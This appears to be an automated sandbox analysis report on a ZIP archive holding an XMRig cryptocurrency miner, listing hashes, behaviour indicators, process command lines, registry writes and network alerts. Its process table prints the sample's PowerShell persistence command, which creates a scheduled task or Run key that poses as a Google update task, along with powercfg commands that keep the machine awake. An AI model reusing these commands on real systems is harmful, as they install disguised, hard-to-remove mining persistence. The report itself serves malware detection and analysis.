| File name: | 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.zip |
| Full analysis: | https://app.any.run/tasks/a50f038d-8d9c-4296-8b8c-02b1125f7e57 |
| Verdict: | Malicious activity |
| Threats: | Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. |
| Analysis date: | March 24, 2025, 15:41:56 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v5.1 to extract, compression method=AES Encrypted |
| MD5: | 2F9B12947C8854A3F040AE1CADD15C73 |
| SHA1: | B8FEBCD0228592F26A0B442E9A6F899D085C1E6F |
| SHA256: | A90C22F60C0BEA09BBBA772BD97995503659B19207348DB2BA05C23DA92B316E |
| SSDEEP: | 98304:uUbkO4XspkSB2jpN8JTN7uE3OpdLLdfG3LgUD+IY+A+0wqhezScskB2c4NlUIb41:nf6o |
MALICIOUS
Executing a file with an untrusted certificate
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 3896)
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
- updater.exe (PID: 5864)
Generic archive extractor
- WinRAR.exe (PID: 5072)
Vulnerable driver has been detected
- updater.exe (PID: 5864)
MINER has been detected (SURICATA)
- conhost.exe (PID: 2908)
- svchost.exe (PID: 2196)
XORed URL has been found (YARA)
- conhost.exe (PID: 2908)
XMRIG has been detected (YARA)
- conhost.exe (PID: 2908)
Connects to the CnC server
- conhost.exe (PID: 2908)
SUSPICIOUS
Manipulates environment variables
- powershell.exe (PID: 4068)
- powershell.exe (PID: 5968)
Checks a user's role membership (POWERSHELL)
- powershell.exe (PID: 3096)
- powershell.exe (PID: 6112)
- powershell.exe (PID: 1128)
Uses powercfg.exe to modify the power settings
- cmd.exe (PID: 4740)
- cmd.exe (PID: 632)
Executable content was dropped or overwritten
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
- updater.exe (PID: 5864)
The process executes via Task Scheduler
- updater.exe (PID: 5864)
Drops a system driver (possible attempt to evade defenses)
- updater.exe (PID: 5864)
Uses WMIC.EXE to obtain a list of video controllers
- cmd.exe (PID: 5964)
Starts CMD.EXE for commands execution
- updater.exe (PID: 5864)
Accesses video controller name via WMI (SCRIPT)
- WMIC.exe (PID: 896)
Potential Corporate Privacy Violation
- svchost.exe (PID: 2196)
- conhost.exe (PID: 2908)
Connects to unusual port
- conhost.exe (PID: 2908)
INFO
Manual execution by a user
- powershell.exe (PID: 4068)
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 3896)
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
- powershell.exe (PID: 3096)
- cmd.exe (PID: 5504)
- powershell.exe (PID: 5968)
- powershell.exe (PID: 6112)
- cmd.exe (PID: 4740)
- cmd.exe (PID: 632)
- powershell.exe (PID: 1128)
- conhost.exe (PID: 6708)
- cmd.exe (PID: 5756)
- conhost.exe (PID: 2908)
- notepad++.exe (PID: 3032)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 5072)
The sample compiled with english language support
- WinRAR.exe (PID: 5072)
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 5968)
- powershell.exe (PID: 4068)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 5968)
- powershell.exe (PID: 4068)
- powershell.exe (PID: 6112)
- powershell.exe (PID: 1128)
Checks supported languages
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
Creates files in the program directory
- 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe (PID: 6676)
- cmd.exe (PID: 5964)
- updater.exe (PID: 5864)
The sample compiled with japanese language support
- updater.exe (PID: 5864)
UPX packer has been detected
- conhost.exe (PID: 2908)
Reads the software policy settings
- slui.exe (PID: 4172)
- slui.exe (PID: 1012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 51 |
|---|---|
| ZipBitFlag: | 0x0003 |
| ZipCompression: | Unknown (99) |
| ZipModifyDate: | 2025:03:24 15:21:08 |
| ZipCRC: | 0x7afe84a7 |
| ZipCompressedSize: | 2080277 |
| ZipUncompressedSize: | 2150680 |
| ZipFileName: | 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe |
Total processes
181
Monitored processes
43
Malicious processes
3
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 632 | C:\WINDOWS\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 664 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 896 | wmic PATH Win32_VideoController GET Name, VideoProcessor | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 968 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 968 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1012 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1128 | C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe <#elcxgsel#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1240 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1760 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
34 296
Read events
34 277
Write events
19
Delete events
0
Modification events
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.zip | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface\MainWin |
| Operation: | write | Name: | Placement |
Value: 2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF3D0000002D000000FD03000016020000 | |||
| (PID) Process: | (5072) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths |
| Operation: | write | Name: | name |
Value: 256 | |||
Executable files
5
Suspicious files
2
Text files
21
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5072 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb5072.24607\9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe | executable | |
MD5:E77DEDF5BF9A251E0F10DB9B3545FB03 | SHA256:9B4D6EB9B5BF2C99B4B977A12C284874B104D570524A013583EC125B3BA4F70E | |||
| 1128 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_d0rwvduz.qjh.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1128 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_xdbdh4q3.y2k.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6676 | 9b4d6eb9b5bf2c99b4b977a12c284874b104d570524a013583ec125b3ba4f70e.exe | C:\Program Files\Google\Chrome\updater.exe | executable | |
MD5:E77DEDF5BF9A251E0F10DB9B3545FB03 | SHA256:9B4D6EB9B5BF2C99B4B977A12C284874B104D570524A013583EC125B3BA4F70E | |||
| 5968 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_msw2jynd.30w.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5968 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_eoknrna2.bgl.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5968 | powershell.exe | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:908ACFEA8EFBAE3C12868F8A48F44C93 | SHA256:A1E048783D62F6C11C3E42810F19878A0993CCB1443AE45E907601D12E88C781 | |||
| 3096 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ekgt2jvj.el3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3096 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_upls2q5k.llr.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1128 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_ky5zp2ye.qv2.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
26
DNS requests
18
Threats
3
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.195:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
856 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
856 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
5056 | backgroundTaskHost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2104 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.48.23.195:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3216 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6544 | svchost.exe | 20.190.159.73:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6544 | svchost.exe | 23.54.109.203:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
2112 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5056 | backgroundTaskHost.exe | 20.74.47.205:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Potential Corporate Privacy Violation | ET INFO Observed DNS Query to Coin Mining Domain (nanopool .org) |
2908 | conhost.exe | Potential Corporate Privacy Violation | ET INFO Cryptocurrency Miner Checkin |
2908 | conhost.exe | Potential Corporate Privacy Violation | ET INFO Cryptocurrency Miner Checkin |